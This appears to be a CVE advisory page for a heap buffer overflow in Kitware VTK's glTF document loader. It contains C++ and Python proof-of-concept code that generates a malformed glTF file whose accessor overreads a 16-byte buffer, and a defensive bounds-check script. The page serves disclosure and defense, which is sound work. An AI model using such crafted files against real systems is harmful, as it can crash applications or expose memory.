Security Vulnerability Report
CVE-2025-57107 CVSS 7.1 HIGH

CVE-2025-57107

Published: 2025-10-31 15:15:42
Last Modified: 2025-11-05 19:42:18

Description

Kitware VTK (Visualization Toolkit) through 9.5.0 contains a heap buffer overflow vulnerability in vtkGLTFDocumentLoader. When processing specially crafted GLTF files, the copy constructor of Accessor objects fails to properly validate buffer boundaries before performing memory read operations.

CVSS Details

CVSS Score: 7.1
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:vtk:vtk:*:*:*:*:*:*:*:* - VULNERABLE
Kitware VTK < 9.5.0
Kitware VTK 9.5.0 and all earlier versions

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```cpp
// CVE-2025-57107 PoC - Malicious GLTF file for Kitware VTK heap buffer overflow
// This PoC demonstrates a malformed GLTF file that triggers the vulnerability
// in vtkGLTFDocumentLoader's Accessor copy constructor
#include <iostream>
#include <fstream>
#include <string>
#include <vector>

// Create a malicious GLTF JSON that triggers buffer boundary validation failure
std::string createMaliciousGLTF() {
    // Malicious GLTF with crafted accessor parameters
    // The accessor points beyond actual buffer boundaries
    std::string gltf = R"({
  "asset": {"version": "2.0"},
  "buffers": [
    {
      "byteLength": 16,
      "uri": "data:application/octet-stream;base64,AAAAAAAAAAAAAAAA"
    }
  ],
  "bufferViews": [
    {
      "buffer": 0,
      "byteOffset": 0,
      "byteLength": 16
    }
  ],
  "accessors": [
    {
      "bufferView": 0,
      "componentType": 5126,
      "count": 100,
      "type": "VEC3",
      "max": [1.0, 1.0, 1.0],
      "min": [-1.0, -1.0, -1.0]
    }
  ],
  "meshes": [
    {
      "primitives": [
        {
          "attributes": {"POSITION": 0}
        }
      ]
    }
  ]
})";
    return gltf;
}
```

Alternative: Python script to generate malicious GLTF

```python
#!/usr/bin/env python3
# CVE-2025-57107 PoC - Generate malicious GLTF file
# Triggers heap buffer overflow in Kitware VTK vtkGLTFDocumentLoader
import json
import base64


def create_poc_gltf():
    # Create a minimal buffer (16 bytes)
    buffer_data = b'\x00' * 16
    buffer_uri = "data:application/octet-stream;base64," + base64.b64encode(buffer_data).decode()

    # Malicious GLTF with accessor requesting more data than buffer contains
    # count: 100 with VEC3 (3 floats each) = 1200 bytes, but buffer is only 16 bytes
    gltf = {
        "asset": {"version": "2.0"},
        "buffers": [{
            "byteLength": 16,
            "uri": buffer_uri
        }],
        "bufferViews": [{
            "buffer": 0,
            "byteOffset": 0,
            "byteLength": 16
        }],
        "accessors": [{
            "bufferView": 0,
            "componentType": 5126,  # FLOAT
            "count": 100,  # Requests 100 * 3 * 4 = 1200 bytes
            "type": "VEC3",
            "max": [1.0, 1.0, 1.0],
            "min": [-1.0, -1.0, -1.0]
        }],
        "meshes": [{
            "primitives": [{
                "attributes": {"POSITION": 0}
            }]
        }]
    }

    with open('malicious.gltf', 'w') as f:
        json.dump(gltf, f, indent=2)
    print("Malicious GLTF file created: malicious.gltf")


if __name__ == "__main__":
    create_poc_gltf()
```
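A pre-parse bounds check for the condition described above, as an added example that is not VTK's code or its fix: it applies the glTF 2.0 accessor-fit rule to the parsed JSON so an oversized accessor is rejected before the file reaches a loader. The names `accessor_violations`, `element_size` and `sample` and the sample documents are constructed here, and fields are assumed to carry their schema types.

```python
# Component and element sizes from the glTF 2.0 specification.
COMPONENT_BYTES = {5120: 1, 5121: 1, 5122: 2, 5123: 2, 5125: 4, 5126: 4}
TYPE_SHAPE = {"SCALAR": (1, 1), "VEC2": (1, 2), "VEC3": (1, 3), "VEC4": (1, 4),
              "MAT2": (2, 2), "MAT3": (3, 3), "MAT4": (4, 4)}  # (columns, rows)


def element_size(acc):
    """Bytes per element; matrix columns are padded to 4-byte boundaries."""
    comp = COMPONENT_BYTES.get(acc.get("componentType"), 0)
    cols, rows = TYPE_SHAPE.get(acc.get("type"), (0, 0))
    col_bytes = rows * comp
    return cols * (-(-col_bytes // 4) * 4 if cols > 1 else col_bytes)


def accessor_violations(gltf):
    """List each bufferView or accessor whose declared range exceeds its storage."""
    problems = []
    buffers, views = gltf.get("buffers", []), gltf.get("bufferViews", [])
    for i, view in enumerate(views):
        b, off, length = view.get("buffer", -1), view.get("byteOffset", 0), view.get("byteLength", 0)
        if not 0 <= b < len(buffers) or min(off, length) < 0 or off + length > buffers[b].get("byteLength", 0):
            problems.append(f"bufferView {i}: range exceeds its buffer")
    for i, acc in enumerate(gltf.get("accessors", [])):
        if "bufferView" not in acc:
            continue  # no backing bufferView (zero-filled or sparse-only accessor)
        v, off, count, elem = acc["bufferView"], acc.get("byteOffset", 0), acc.get("count", 0), element_size(acc)
        if not 0 <= v < len(views) or off < 0 or count < 1 or elem == 0:
            problems.append(f"accessor {i}: invalid bufferView, offset, count or type")
            continue
        needed = off + (views[v].get("byteStride") or elem) * (count - 1) + elem
        if needed > views[v].get("byteLength", 0):
            problems.append(f"accessor {i}: needs {needed} bytes, bufferView {v} holds {views[v].get('byteLength', 0)}")
    return problems


def sample(count):
    """Constructed input: 16-byte buffer and one FLOAT VEC3 accessor of `count` elements."""
    return {"asset": {"version": "2.0"},
            "buffers": [{"byteLength": 16}],
            "bufferViews": [{"buffer": 0, "byteOffset": 0, "byteLength": 16}],
            "accessors": [{"bufferView": 0, "componentType": 5126, "count": count, "type": "VEC3"}]}


if __name__ == "__main__":
    for n in (1, 100):
        print(n, accessor_violations(sample(n)) or "ok")
```

The check covers declared lengths only; the number of bytes actually loaded for each buffer still has to be compared against its `byteLength` by whatever reads the payload.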

References

https://gitlab.kitware.com/vtk/vtk/-/issues/19732 (Exploit, Issue Tracking, Third Party Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-57107", "sourceIdentifier": "[email protected]", "published": "2025-10-31T15:15:42.443", "lastModified": "2025-11-05T19:42:17.657", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Kitware VTK (Visualization Toolkit) through 9.5.0 contains a heap buffer overflow vulnerability in vtkGLTFDocumentLoader. When processing specially crafted GLTF files, the copy constructor of Accessor objects fails to properly validate buffer boundaries before performing memory read operations."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-122"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:vtk:vtk:*:*:*:*:*:*:*:*", "versionEndIncluding": "9.5.0", "matchCriteriaId": "4FACF42A-92AA-4011-9219-A8F328C6FF63"}]}]}], "references": [{"url": "https://gitlab.kitware.com/vtk/vtk/-/issues/19732", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}]}}